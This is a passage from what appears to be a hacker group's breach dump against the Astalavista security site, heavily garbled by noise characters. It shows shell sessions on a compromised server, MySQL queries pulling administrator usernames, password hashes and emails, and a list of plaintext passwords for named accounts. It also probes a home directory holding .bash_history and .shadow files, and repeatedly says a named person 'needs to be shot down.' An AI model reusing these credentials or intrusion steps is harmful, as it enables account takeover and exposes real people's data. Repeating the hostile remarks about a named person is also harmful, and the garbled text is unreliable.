& Y) _" U( D" K5 ^( a1 Y0 R9 f <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>: s$ z" ^5 g" d; C7 H
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
9 R: y# ?6 {1 Y5 c' K( K7 L0 T: W& V <generator>Astalavista.com</generator>
' n' V% p* Z B. C <webMaster>info@astalavista.com</webMaster>’ . $items . ‘1 d' W6 ]" X: D) C
</channel>0 i1 h# W9 h) L5 V3 K2 L
</rss>’;( b9 ]! G( l4 K9 @; z Z- X
+ h0 l% z. |# j if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {- E% x0 G" G+ y: ?- Y" C
unlink (FULLPATH . ‘/feed/exploits.xml’);; O+ A0 F, s; u, J7 X4 y
}
! r$ @. J" E: j7 a
% D$ m# \8 i' B9 @ file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml); ^ g4 M2 o2 }' q5 {! S" J% ]3 y
[snip]4 u6 U4 f$ x! R/ d
( K! \% [' B0 {& @- x: A
sh-3.2$ cat exploits.sh
* g7 r3 y1 w* e/ T1 T. L#!/bin/sh/ _' l3 v0 b/ V' t$ x; A' c. G
* ~2 C/ P- k- x
###########################################################% [2 A; l& z7 q9 D9 h; O4 x4 u
# #* I, N" q6 A# r4 F8 M
# Title: milw0rm exploits adder #' I$ A) A# j- A. k; w/ c
# Description: Add all milw0rm exploits to the #
7 i, R$ c3 h/ n! d# Astalavista.com database #
1 Q- O6 C5 M7 {$ v( q# #* R U2 f) F8 z% ]& u$ t
# Company: Astalavista Group #' |5 B, }. d. I. A6 }
# Author: Paulo M. Santos #7 ?# k, x, K7 N/ ~- m) ~- p- h
# E-Mail: 链接标记paulo.santos@astalavista.ch #& |% V+ I3 U$ r7 b+ A
# #
/ ^- J( Z1 ^( K# k. ~& N###########################################################+ ]( K- u/ V( [! ~4 R$ y
9 Y# E& H- t5 J1 v* Y$ D5 |
# path% L" K6 |" X( D l& n8 N- `3 t
this_path=/home/com/public_html/modifications/cronjobs
& { ]. o& B5 j# m
% i! N$ Y* J# \8 q* \) P# change directory+ Q6 X& S+ b. R
cd $this_path
T. F$ T( |1 \5 wcd tmp/
5 _2 S* }8 Q0 F# g# t" Z& x% S/ P: |- l- y- R
# delete files
( k6 w& c( w @) ^rm -rf milw0rm.tar.* &
i' u4 q; M5 A1 r5 n+ o( b5 Yrm -rf milw0rm/ &
0 {4 \6 I7 [- _ ~* Z" F4 @- V+ `. k1 E% J$ _
# wget milw0rm paket z! Z2 W/ L$ @8 X0 @* C2 w4 X
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
- w* h3 a. O2 S4 f( h1 T+ y. i/ ^; \5 R; ?0 {0 f
# extract milw0rm paket
( t; h7 z N- O% E" rtar -xvf milw0rm.tar.bz20 H5 ^1 n+ w/ [5 c
9 c$ q( G9 l1 Q" x% C4 G
# change owner
6 G& |$ B, W A- G% k( D: T# ?. Ichown -R com .
5 ~2 q5 b6 ^) Q3 W7 Ochgrp -R com .4 ^4 P3 x. y8 C) p: S' V/ P2 C
& H- s& y$ w( e6 q6 s# execute php script J v" h* u5 r8 p
cd $this_path
" F V; E" j3 Z7 j! @3 fphp -q exploits.php' J: m: F- s) U
6 S- u( \. [# t0 m" v4 r5 t5 k
# delete files1 K- q$ s5 m+ v1 V$ {
rm -rf tmp/milw0rm.tar.*
- u' E- k, B4 W Y3 P) h8 Rrm -rf tmp/milw0rm/' I3 K8 _: h; b# Y/ @
- l3 l$ j9 e2 \sh-3.2$ echo “Paulo M. Santos needs to be shot down.”% X! ~- j/ w6 ^+ v1 P3 X
Paulo M. Santos needs to be shot down.
6 f7 m6 a0 W* `( O! w1 ?8 S. `8 @5 H& e9 P
mysql -u contrexxuser2 -p
+ w9 o: K8 ~. Y" W5 _Enter password:0 e) V7 T q' _4 r* o4 l4 e, N2 x
Welcome to the MySQL monitor. Commands end with ; or \g.- R3 C n* t- Y* d, U8 u
Your MySQL connection id is 261694; S; z: O7 x) S3 Q
Server version: 5.0.45-community-log MySQL Community Edition (GPL)- m# B3 T0 ?& G7 q5 ?$ l
p4 T* C! n$ M8 F
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
+ ?+ M: V, O3 o+ `5 V
* k- `) l' y6 ?7 omysql> show databases;. z- ?9 n5 J' Z
+——————–+
) l) b& d, i+ S/ Q| Database |
9 `2 b# O" n& O2 f% x# C: o$ n+——————–+
" q8 z4 f' _0 c( P4 i) T r| information_schema |
. V2 q, Q' n% l8 p) c/ {- K4 S2 W5 d0 d| com_contrexx2 |
/ A* x) w/ K' Y8 k5 A| com_contrexx2_live |
. z; P: G- @! D| test |
$ p& l6 C( n& u- u2 j+——————–+
8 j' B; J% N* q* ^4 rows in set (0.00 sec)/ Z4 a7 o9 X) s
1 a3 s% f/ [+ l! g' |mysql> use com_contrexx2_live' f$ _+ n5 z9 T. a
Database changed) P x# R/ d' \5 D5 Y4 D, n
mysql> show tables;
( C9 f# x9 P8 _- C1 {+————————————————–+! A9 e( k$ x7 ~& ^6 l
| Tables_in_com_contrexx2_live |
' N5 H# F& R3 |4 k, c# i9 _: q+————————————————–+4 l) l. Z) P2 R5 S
| cc_banner_counter |9 A' `3 f3 C B+ D, ]2 a
| cc_search_counter |
7 S* s; r( H, \+ P7 v; p7 p7 `| contrexx_access_group_dynamic_ids |
9 x, Q8 i3 j( Z: h0 W; b! ~| contrexx_access_group_static_ids |
% I( N4 w: ]/ ?' m' W| contrexx_access_rel_user_group |4 f% U; L0 ?9 u# R4 D
| contrexx_access_settings |
5 ~0 Z, O8 V& w. [, w! u, l& m- x| contrexx_access_user_attribute |; t# G; |) @3 @; ], G
| contrexx_access_user_attribute_name |
1 F* g% W6 g1 e, g; [( P| contrexx_access_user_attribute_value |6 z. l! b: a5 v# d0 \* x
| contrexx_access_user_core_attribute |' `8 X0 X5 p" f; O' l
| contrexx_access_user_groups |
2 d3 a7 R8 O! N7 _" e9 m| contrexx_access_user_mail |$ L2 B% u( p) a) T6 s* v
| contrexx_access_user_profile |2 }6 Y( H p# C$ ?2 c
| contrexx_access_user_title |0 N `; R+ V* c7 q7 j/ L
| contrexx_access_user_validity |
3 @. C9 C& x/ i. i( O4 p! a| contrexx_access_users |
: ~, r! g8 _' ^* I| contrexx_backend_areas |- L' e2 G% \2 B1 D6 m
| contrexx_backups |
6 k5 b- p$ Y7 n| contrexx_content |
0 ?6 t1 d5 V! z% J1 p| contrexx_content_history |
; j# B5 ]# r" p6 t3 l| contrexx_content_logfile |. G& `1 [& G5 Y9 h
| contrexx_content_navigation |
' K) J% F/ B6 Y& k& d; o| contrexx_content_navigation_history |
2 r5 x- B9 [9 k& U- \| contrexx_ids |
6 j# Q% d3 g/ v7 n* R/ ]' f| contrexx_languages |2 J2 {# S/ m. A; B- S
| contrexx_lib_country |
i+ p& J, b5 g$ p7 X6 K$ Z| contrexx_log |. @# J2 N! M9 I6 g7 l( o8 \5 F
| contrexx_module_alias_source |
' y. e1 A2 D7 Q4 B& o8 t. j| contrexx_module_alias_target |
8 T) V9 U' X8 h% m| contrexx_module_block_blocks |
/ V0 m" [' ~ o| contrexx_module_block_rel_lang |! ~( g1 T; J# ?, U: U+ |
| contrexx_module_block_rel_pages |
6 ^4 C+ X8 w, [8 d* o| contrexx_module_block_settings |5 O& B. |* {; _) s1 W
| contrexx_module_blog_categories |- `+ ~; P0 W6 N5 E( w
| contrexx_module_blog_comments |6 D) |) U( i' K% p7 C- C
| contrexx_module_blog_message_to_category |
2 @8 ~# o7 N. C; F5 j* I8 l| contrexx_module_blog_messages |
S8 o; k R" A| contrexx_module_blog_messages_lang |
4 K- K- l) Q) { z5 L| contrexx_module_blog_networks |5 a! S. @" ~& N8 I/ F8 ~( G
| contrexx_module_blog_networks_lang |
- E, L' P7 A* X: P+ M( o( n% P" Y| contrexx_module_blog_settings |8 M. @& L0 z; Q& k. H0 M7 V; `
| contrexx_module_blog_votes |0 t9 [/ C8 y7 o. x0 \2 g# Y+ ~- X
| contrexx_module_calendar |
) A9 a3 M2 y: {; Z* [' I| contrexx_module_calendar_access |
# }5 S P& ]* `/ b6 U: G/ c9 ~| contrexx_module_calendar_categories |- i. q2 C% D/ d( o
| contrexx_module_calendar_form_data | }# V; n6 q; L) r9 k' i
| contrexx_module_calendar_form_fields |
0 X! J( D5 A7 F1 P0 @+ k$ s2 h& H| contrexx_module_calendar_registrations |: i' j# `4 n( M; m- t: D
| contrexx_module_calendar_settings |
2 @6 M# T1 r% c" L| contrexx_module_calendar_style |/ N) W' _( V2 j$ g& M
| contrexx_module_contact_form |
8 z9 c( j B K5 d* y a7 y| contrexx_module_contact_form_data |
% O- z2 P$ H2 i1 |3 r1 y| contrexx_module_contact_form_field |
/ A! C% ^5 H" O3 U& N| contrexx_module_contact_settings |
. r/ h1 M+ j0 p| contrexx_module_data_categories |2 `: E/ Q$ k( Q3 m S6 S( `, c8 M
| contrexx_module_data_message_to_category |
- B2 v5 p' R0 a/ s( \+ ~: d/ ?| contrexx_module_data_messages |! Z9 G7 W% C, I* ` X' j
| contrexx_module_data_messages_lang |' J# ?% p0 i5 m' Z9 a& Q6 G
| contrexx_module_data_placeholders |/ L! m% U: J6 V1 Z) E( x
| contrexx_module_data_settings |1 K2 i& _8 ]. |8 ?
| contrexx_module_directory_access |, C6 M2 P) Y' C& K4 M6 [! I. w
| contrexx_module_directory_categories |
) H5 m8 E# P: x6 I| contrexx_module_directory_dir |4 M# X: D, T1 B8 ]% ?
| contrexx_module_directory_inputfields |
0 ]" B( b/ z V9 I) ^- H. m$ \| contrexx_module_directory_levels |% `9 A5 p) h* b. c- @! T
| contrexx_module_directory_mail |& Z0 j! j2 |8 D6 [
| contrexx_module_directory_rel_dir_cat |
% w! }2 S' s% S$ M- i| contrexx_module_directory_rel_dir_level |; H: `4 V$ P. }7 a9 z) p
| contrexx_module_directory_settings |5 Z. C; l2 P; W C3 @" x+ l+ p$ G y; {" ~
| contrexx_module_directory_settings_google |
$ Y# v6 s6 o0 V+ A/ a. L| contrexx_module_directory_vote |* _6 C; e2 X+ y8 Z
| contrexx_module_docsys |0 P3 n; L7 g0 ^
| contrexx_module_docsys_categories |
' U# D+ G/ I0 h6 m7 x; ~& z0 d| contrexx_module_egov_configuration |5 X. \% g4 \& s
| contrexx_module_egov_orders |- B0 D r% P6 r! E! ?: w* B8 k, R- C
| contrexx_module_egov_product_calendar |
0 H0 P& @, O r+ h+ || contrexx_module_egov_product_fields |! J4 _: r E& P F7 B! z
| contrexx_module_egov_products |/ \6 `! s! @+ C0 o; O6 O7 U a
| contrexx_module_egov_settings |0 L6 N G+ \! q; X
| contrexx_module_exploits |
* `& @- F4 V3 ~- d: W8 T: || contrexx_module_exploits_categories |
1 U# V7 D1 b4 t5 || contrexx_module_feed_category |: \3 k' F1 F6 P
| contrexx_module_feed_news |
) H a7 D, P: `: T5 s| contrexx_module_feed_newsml_association |
0 J5 B9 f3 E$ C/ [2 R! e# p| contrexx_module_feed_newsml_categories |
) S) x4 S" j, g+ w& r| contrexx_module_feed_newsml_documents |0 D. y5 \! j+ X0 T1 ?9 M/ l
| contrexx_module_feed_newsml_providers |* t: c1 t* ~9 a- \& p* O
| contrexx_module_forum_access |, N% W. t* g% H z4 P
| contrexx_module_forum_categories |1 X: v0 a+ h: C
| contrexx_module_forum_categories_lang |
" }- }' i' i3 T0 K i* G| contrexx_module_forum_notification |
; R- c1 q+ {( s$ P S5 j+ P| contrexx_module_forum_postings |
4 @3 z* ?8 Q5 J| contrexx_module_forum_rating |
$ x! R7 ]. r, H8 h, {% N/ e g/ M| contrexx_module_forum_settings |
5 |! i6 K$ \+ i% }8 b3 b| contrexx_module_forum_statistics |$ c/ W; ~) Z9 w2 Q% k5 e
| contrexx_module_gallery_categories |
0 E( \$ B5 I" \( r& ^/ n" l| contrexx_module_gallery_comments |) `/ R# x( |2 o& S$ d3 T5 V7 K
| contrexx_module_gallery_language |
+ a- W. w: y' H- ~6 T0 G* b2 N| contrexx_module_gallery_language_pics |9 P8 a, a- [# c4 a8 Q
| contrexx_module_gallery_pictures |& O6 n# L! @! h2 t2 O
| contrexx_module_gallery_settings |
% ^$ L, l% N( u$ h/ D| contrexx_module_gallery_votes |& Q' V4 P6 ]) U2 h, D! a% C" o
| contrexx_module_guestbook |
$ `1 j- ~" f5 `0 ~| contrexx_module_guestbook_settings |% B. P r; I* p, t
| contrexx_module_livecam |
9 K5 G3 L9 e9 r* T, j8 ^6 R% T5 @| contrexx_module_livecam_settings |2 f Z$ C& I* x. H3 U# ?9 B
| contrexx_module_market |
' i* I' ~1 e& O5 |5 b| contrexx_module_market_access |/ a h/ F! C' R' y9 t
| contrexx_module_market_categories |
+ y0 x+ r& \0 y i' E& y| contrexx_module_market_mail |
1 o+ K: x3 v# t7 r5 _| contrexx_module_market_paypal |
8 X, t, b. Y5 J| contrexx_module_market_settings |5 o1 n6 X; T) J! A
| contrexx_module_market_spez_fields |* v. _- `6 F" d1 X* m& b
| contrexx_module_mediadir_access |
6 i; J4 ]3 @2 t| contrexx_module_mediadir_categories |
& {$ x; _, N" Z& R9 z4 G9 q7 K0 q| contrexx_module_mediadir_comments |# S/ S. y0 w4 d
| contrexx_module_mediadir_dir |( n" P5 S w$ M M# O
| contrexx_module_mediadir_inputfields |9 _* B5 S( o# o
| contrexx_module_mediadir_levels |! k+ t B0 u1 [& y Q) a
| contrexx_module_mediadir_mail |
3 r. c& P* B$ ?! y' L| contrexx_module_mediadir_rel_dir_cat |
, Y' T: e" D; d, a& K: t# L| contrexx_module_mediadir_rel_dir_level |/ c. h0 h2 x6 Y( J- k( ~7 v
| contrexx_module_mediadir_reports |' w0 h5 ~5 w1 |5 p- l
| contrexx_module_mediadir_settings |1 b+ c( G8 F ~' S/ X H2 W! ?
| contrexx_module_mediadir_settings_google |. p/ Z& l$ y& [9 X# S, p
| contrexx_module_mediadir_vote |0 \+ f+ B6 u* \+ [2 @# h
| contrexx_module_memberdir_directories |
h# p3 s0 f# t- ?' c6 L7 J& L; M| contrexx_module_memberdir_name |
# z+ ^& \; g+ {9 V$ e| contrexx_module_memberdir_settings |
1 }$ j' c$ x' N k/ v9 W7 N4 }3 N; z| contrexx_module_memberdir_values |0 P( y& u$ U* H
| contrexx_module_nettools_allowed_groups |. p8 E; r5 G+ [; ^! r& W6 T
| contrexx_module_nettools_settings |
) L3 v8 ~$ \- g0 `+ B| contrexx_module_news |
9 x5 d3 K# S4 J' w& p; G1 |% R- J' b| contrexx_module_news_access |* i0 D4 E O# i \
| contrexx_module_news_categories |, a0 N7 x7 _" l, h$ N/ X8 q2 _
| contrexx_module_news_settings |
$ b: i3 V6 X9 R" G ]8 Z" z| contrexx_module_news_teaser_frame |
" F+ J% S0 Y7 R$ t9 w* _| contrexx_module_news_teaser_frame_templates |% e, F2 e1 a5 U$ `' Z3 }( u
| contrexx_module_news_ticker |6 K9 V0 v' F% f5 P$ R
| contrexx_module_newsletter |2 R- x K: r% ]/ Q
| contrexx_module_newsletter_attachment |
( ]" V J5 ~( ~. c) I) b; E; M$ `* W| contrexx_module_newsletter_category |2 t2 M0 } [: V& V! L9 v$ Z
| contrexx_module_newsletter_confirm_mail |
3 m% d" q5 R# w7 b Z8 j| contrexx_module_newsletter_rel_cat_news |# ]+ ^- |$ q+ a6 }
| contrexx_module_newsletter_rel_user_cat |
3 D- b# L' @0 o6 V' g( a| contrexx_module_newsletter_settings |# C' `) l: X9 X# K$ ?5 q4 [
| contrexx_module_newsletter_template |- ~" x1 z# \7 M5 ?; D
| contrexx_module_newsletter_tmp_sending |; C! r' H* ~5 N
| contrexx_module_newsletter_user |
' L/ ~& z) x! U) A| contrexx_module_newsletter_user_title |8 C9 L/ }) I2 }7 K: d3 }
| contrexx_module_onlinetools_defaultports |4 o4 \1 V/ U: ~" N1 Y z! x0 @
| contrexx_module_onlinetools_defaultports_back |
0 R6 |0 ?* a* l" S| contrexx_module_onlinetools_geolitecity_blocks |
$ T0 I# y, n( [$ T& O| contrexx_module_onlinetools_geolitecity_country |
& j) {" W% {# v+ V3 G- f4 P| contrexx_module_onlinetools_geolitecity_location |. I$ e8 c$ R7 k
| contrexx_module_podcast_category |
, y7 h$ F. J! i; \& B; l0 V| contrexx_module_podcast_medium |
% r7 r+ \6 f2 ~7 N9 c0 c6 e| contrexx_module_podcast_rel_category_lang |
; y0 [; }9 j' }* q| contrexx_module_podcast_rel_medium_category |3 ?7 H5 K) v z# h1 C" N4 m
| contrexx_module_podcast_settings |7 @, f7 ~, t4 T. \
| contrexx_module_podcast_template |
- P% B0 R* ^" M! G- V/ t3 W" f. D| contrexx_module_proxydb |
+ C1 I- A, l' v% p0 ~' l2 K* o| contrexx_module_recommend |- i! Y* z1 O0 J5 P" u' u
| contrexx_module_repository |
3 Y0 G' x C7 K* j8 ^9 b| contrexx_module_securitynews_cats |( x/ M5 O( J% |& l
| contrexx_module_securitynews_feeds |
. T+ k7 s! ^& R$ J6 q( n| contrexx_module_securitynews_news |
2 S7 u# }8 v* h9 ~2 W: E5 t| contrexx_module_shop_categories |. b; b* S6 m) _2 G
| contrexx_module_shop_config |. m4 @' L* S* K, ? f
| contrexx_module_shop_countries |
3 E: d+ S$ N" s) @, a: m$ b2 [| contrexx_module_shop_currencies |
# B2 ^* A4 l* i| contrexx_module_shop_customers |. X& @) n) u( o' |) f1 o+ L
| contrexx_module_shop_importimg | z+ q) Y0 c- Y* J, s" Y" e
| contrexx_module_shop_lsv |
7 s! F5 Z4 a! F7 m) H8 g| contrexx_module_shop_mail |
, L3 n) `0 ~% z( l9 L4 d: I| contrexx_module_shop_mail_content |
- G7 I' G( r/ q. |- K Z| contrexx_module_shop_manufacturer |: v5 R2 o i; Z6 d
| contrexx_module_shop_order_items |! @4 N5 k) f; D; c& E; R4 V$ `
| contrexx_module_shop_order_items_attributes |
/ m2 @+ d' p7 e7 c- i: e: }9 j5 k| contrexx_module_shop_orders |
/ o+ L# ^0 k1 y4 U| contrexx_module_shop_payment |* f! C/ J/ P& g" ^! I) u0 A
| contrexx_module_shop_payment_processors |
; z& ?) \( _/ q7 p| contrexx_module_shop_pricelists |: V% E, h1 b8 n. {; `( x, N
| contrexx_module_shop_products |7 n6 m. J+ x. Q$ [3 S1 W2 ~* y9 p
| contrexx_module_shop_products_attributes | v8 F' f/ H7 q5 K+ z& l2 M+ Q
| contrexx_module_shop_products_attributes_name |
$ g3 {: Z9 x* m9 @- R| contrexx_module_shop_products_attributes_value |, H% z9 y) u p1 ~8 J2 X
| contrexx_module_shop_products_downloads |( o( z2 o- n" `/ v9 o( e$ n
| contrexx_module_shop_rel_countries |
9 y2 X. I B h* c# W| contrexx_module_shop_rel_payment |9 U) _3 ]$ h6 @5 F& g% @0 l% r. |
| contrexx_module_shop_rel_shipment |2 D- K; W5 `7 P2 D8 p) Y
| contrexx_module_shop_shipment_cost |
" b9 ?9 G* [5 d' A| contrexx_module_shop_shipper |# L. _! F p# ?: A9 A: G8 A m* y9 R
| contrexx_module_shop_vat |
: M" G7 Y1 G+ j% s" x2 y+ C* `| contrexx_module_shop_zones |
" A/ p& ]- w' F' R| contrexx_module_u2u_address_list |& P1 d/ i" l) h& S6 q& J3 H# D$ |
| contrexx_module_u2u_message_log |
6 Z( `* z4 N: O0 Z* y J| contrexx_module_u2u_sent_messages |
6 a9 ^- o! c; y- M" H8 R% k/ y| contrexx_module_u2u_settings |0 K! L6 T9 m$ [; x. N) U+ W" t4 d
| contrexx_module_u2u_user_log |: N% p& b8 b( H. h* R2 S f
| contrexx_modules |
2 I* i" E6 W9 _3 p, C- ~| contrexx_sessions |
; G+ d5 Y( C' Z, I$ ~4 @| contrexx_settings |; A* K2 `6 ]( m! X* e
| contrexx_settings_smtp |1 Q" l5 m$ B% y R F+ z6 m
| contrexx_skins |
- o! j7 J$ e& @7 b* V| contrexx_stats_browser |7 ?! H, ^; l9 V- O3 }) W
| contrexx_stats_colourdepth |/ u4 E* R( @$ X7 H
| contrexx_stats_config |
2 a7 J3 y. K+ u4 Z0 v# F| contrexx_stats_country |
- U g- H* U% K( Q+ S| contrexx_stats_hostname |
6 L2 K, `1 F- T4 ~| contrexx_stats_javascript |
# A8 q( v' Z/ w+ k: g: m| contrexx_stats_operatingsystem |/ E" Z* K2 o/ I/ A6 C
| contrexx_stats_referer |8 f1 V7 _; ~3 M6 j
| contrexx_stats_requests |; D1 V) [# ^' r) n1 R+ o6 b- S9 y
| contrexx_stats_requests_summary |5 c: s' n/ B. {) j( i+ G
| contrexx_stats_screenresolution |
; [1 K5 o8 ^5 E| contrexx_stats_search |* A- U3 y0 n8 H% X8 B [
| contrexx_stats_spiders |5 c+ w: G8 A9 A
| contrexx_stats_spiders_summary |& C+ i" f i H& A0 ~' S0 G" _- W3 I' h
| contrexx_stats_visitors |+ R& `; O/ R9 P, g: A
| contrexx_stats_visitors_summary |
, N* a: m0 y8 ~2 Z| contrexx_voting_additionaldata |" p+ u! v. q# v8 H. D) u$ p' T! a
| contrexx_voting_email |/ c9 M/ b0 b5 y% e; N9 m
| contrexx_voting_rel_email_system |7 v- p6 g4 Q, c' O. _7 t, |
| contrexx_voting_results |6 e% \$ J5 X! H. V
| contrexx_voting_system |
' q% ^) O. d6 K9 C6 U, H| foo |' M) q4 a2 k k
+————————————————–+
K/ x, q0 n5 J227 rows in set (0.01 sec)
x+ c, T; R+ Z2 n5 _" }2 @! O8 T, G& H3 e
mysql> select count(*) as skids from contrexx_access_users;
9 V; I) L9 [- L8 G5 J+——-+
1 K( O* @8 P+ L) e5 d3 S5 X/ ]| skids |
; U9 [9 O; ^; K4 S0 G5 H+——-+
( z6 }9 ^# ~9 ?) Q| 53699 |
) \8 ], {8 q! X8 p, Y, L+——-+) z8 [- {2 k& x! W
1 row in set (0.00 sec)+ W g* j, z- Q; M. f5 G
9 |- e$ ]& m" ^' x6 P% @- G( ~mysql> describe contrexx_access_users;
8 j2 U1 E, Z7 n3 M+——————+——————————————+——+—–+————–+—————-++ k+ l; W0 x3 A4 O! g
| Field | Type | Null | Key | Default | Extra |. i! p4 j, a; c% K9 K
+——————+——————————————+——+—–+————–+—————-+! E% H( U6 N$ X( Y! F+ Y: i. y
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
; P! |3 O7 v! p5 T6 O6 A| is_admin | tinyint(1) unsigned | NO | | 0 | |
+ H2 S2 j1 y. T8 A| username | varchar(40) | YES | MUL | NULL | |
% w2 c0 T3 ?. \8 g; \" d| password | varchar(32) | YES | | NULL | |
- v+ w* }+ l2 U| regdate | int(14) unsigned | NO | | 0 | |
- \8 i! i6 e# X' `4 a1 w| expiration | int(14) unsigned | NO | | 0 | |
: s. _/ p% Q/ v9 e' q1 O; S+ K( A| validity | int(10) unsigned | NO | | 0 | |
7 ^+ [ q$ L9 f/ i| last_auth | int(14) unsigned | NO | | 0 | |
1 M( |4 ^3 o/ V1 h; U+ t( j| last_activity | int(14) unsigned | NO | | 0 | |) P: r) U! n2 m9 `4 r$ G U" O
| email | varchar(255) | YES | | NULL | |
' \' V5 a* i9 ~: j* [) Z| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
2 w$ o2 F& i1 j/ E5 X| frontend_lang_id | int(2) unsigned | NO | | 0 | |; m) D2 c9 ~* B' A9 ~
| backend_lang_id | int(2) unsigned | NO | | 0 | |+ Q/ _! s! c: t3 i6 ~
| active | tinyint(1) | NO | | 0 | |! p/ [' y0 y' u; V0 ]# Q* k
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |# k$ T) s( |8 b) M4 z% N
| restore_key | varchar(32) | NO | | | |
: ~" G8 |! t# P" K2 F| restore_key_time | int(14) unsigned | NO | | 0 | |
9 @" k6 f+ g* j3 j4 R| u2u_active | enum(’0′,’1′) | NO | | 1 | |
7 v! b3 N7 | \* h* d+——————+——————————————+——+—–+————–+—————-+
: N) u! }: o: t18 rows in set (0.00 sec)
9 ` x- p7 @, i1 ?" _3 f8 Z5 h: i# ~9 P2 ?) b
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
4 `! E- y8 \) D$ y1 J6 q* A0 `& T+————+———————————-+—————————–+& _* T2 |9 G6 [1 i% g6 l W" i! H
| username | password | email |% |% h+ M/ U1 d3 U3 g4 q" c
+————+———————————-+—————————–+
$ j W) _+ ~5 }3 b| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |$ b6 Z r2 C. B
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
& p5 @ [3 u6 J9 q4 m' @7 ]| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
5 S# {% z8 O+ r- l7 t; z/ h# H3 n! f| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
$ ?, @+ K/ m3 E* y- D+————+———————————-+—————————–+
& }4 Z# O1 q+ K4 rows in set (0.04 sec)
+ m: N, a9 f6 F5 H7 O3 D O
" z4 X' f7 v0 E6 kmysql> exit;
! t% z7 |% e" i% ^8 cBye( R q) j$ k# M+ j$ S0 j" r
$ ~$ l( U! A% Q[~] There you go, your “team of security and IT professionals” is a joke." F: Q! X" T0 B; L( l8 k
3 t# R0 `7 t2 q5 G. c! f
+——————————+9 I9 ~, V% {! L- d: s/ [7 Z
system:f82BN3+_*
! [9 U# Z. U2 y# v5 t: [) rBe1er0ph0r:belerophor4astacom
4 w& B4 @' k3 k: {: q5 U8 Qprozac:asta4cms!
5 ~" k2 W) b' Rcommander:mpbdaagf6m
& k4 o' R: M6 {+ n1 Qsykadul:ak29eral
' L( `1 s/ `, a8 d9 w6 ]: u1 E! H+——————————+
; b6 H! O" k+ z
! U1 g& o* J2 k3 y1 Q" d[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
2 }7 Y" W6 F2 s& s6 v5 x0 i…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.1 v4 D" }2 J8 t9 j# U
9 }) V9 k' P) `& C( t- H( p: a3 f" c[~] Lets move to astalavista.net now,( K# n$ E' U: D$ S: ?
) M5 X# Q! I6 Y3 \- ?* m2 H) g; SFrom <链接标记[url]https://www.astalavista.net/[/url]>:* h4 C; x2 G i. \! H0 J* U3 m
>> Everyone knows that the best defense is a good offense./ g' f# n" M# ?
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
9 {$ G5 h" D( K* t: j$ W, n9 m>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
* w* h/ q& F/ A9 J5 a9 G) x>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
" D/ D$ M" r$ V% r' H& r2 j. P/ U) B' `# H9 o
>> Go ahead, try and hack our server . in a completely legal way!
* ^1 f( N. A# l- f: Z8 Z! S0 W>> Learn by doing: We offer our members tricky tasks and challenges on an( O( f# w/ [/ U1 |' g3 q% u
>> ongoing basis so you can test your knowledge and abilities. You can also
+ G) U8 A+ J$ p( g D, s6 [% e. K; M>> demonstrate what you.ve mastered by taking part in regular hacker contests
# c3 L. ^# y: n% h, z>> and war games" N; L) R- ]4 U o3 |# L
; b% x0 h/ k. S, F: t/ `[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
: W% c9 R" h/ @' E- U4 I1 K* L2 o
1 `. h m+ s4 x6 L. j3 D/ w[-] Tricky task: Find home dir of astalavista.net
6 O; D6 I* b% c; D- L1 q2 r. U: h* h9 e
sh-3.2$ ls -la ~astanet( y# F* G" c- `" i: N, [3 Q9 N- p6 K! L! }
total 48
& F" n+ O- e u5 y5 H% e* kdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 ./ Q! W. M: L; G/ N7 Y8 Z; \0 V' ~
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
# h) Q( T7 K7 p) Z7 I0 k. kdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
0 b2 J$ x$ q3 Y/ p: [- ~-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history$ g9 E8 H/ S% M: E' s! P+ ]
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout# G9 X1 d4 \, {' b
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
6 ?% i$ M- E+ f8 x& J-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc- {! p2 i% i8 Y
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
% }+ A) C V4 {drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
6 `7 c& @6 i! qdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
1 p% Q$ `" }% \( K2 N1 Mlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
' R, l" C% J! w: i-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow& d1 ~5 M" n, i7 `0 s9 d! D
4 H$ z7 L8 H8 i5 K. m6 G( G7 Ssh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
# u6 Q/ F8 p% E' j4 Nsh-3.2$ ls -la
z, b) W5 l; J1 O* k% K* Ytotal 200
- k4 H0 r/ ` n3 t! ^. Odrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
/ W. Y# i) x( r9 B5 E2 O( ]) hdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
. e, X& K4 V X+ ndrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
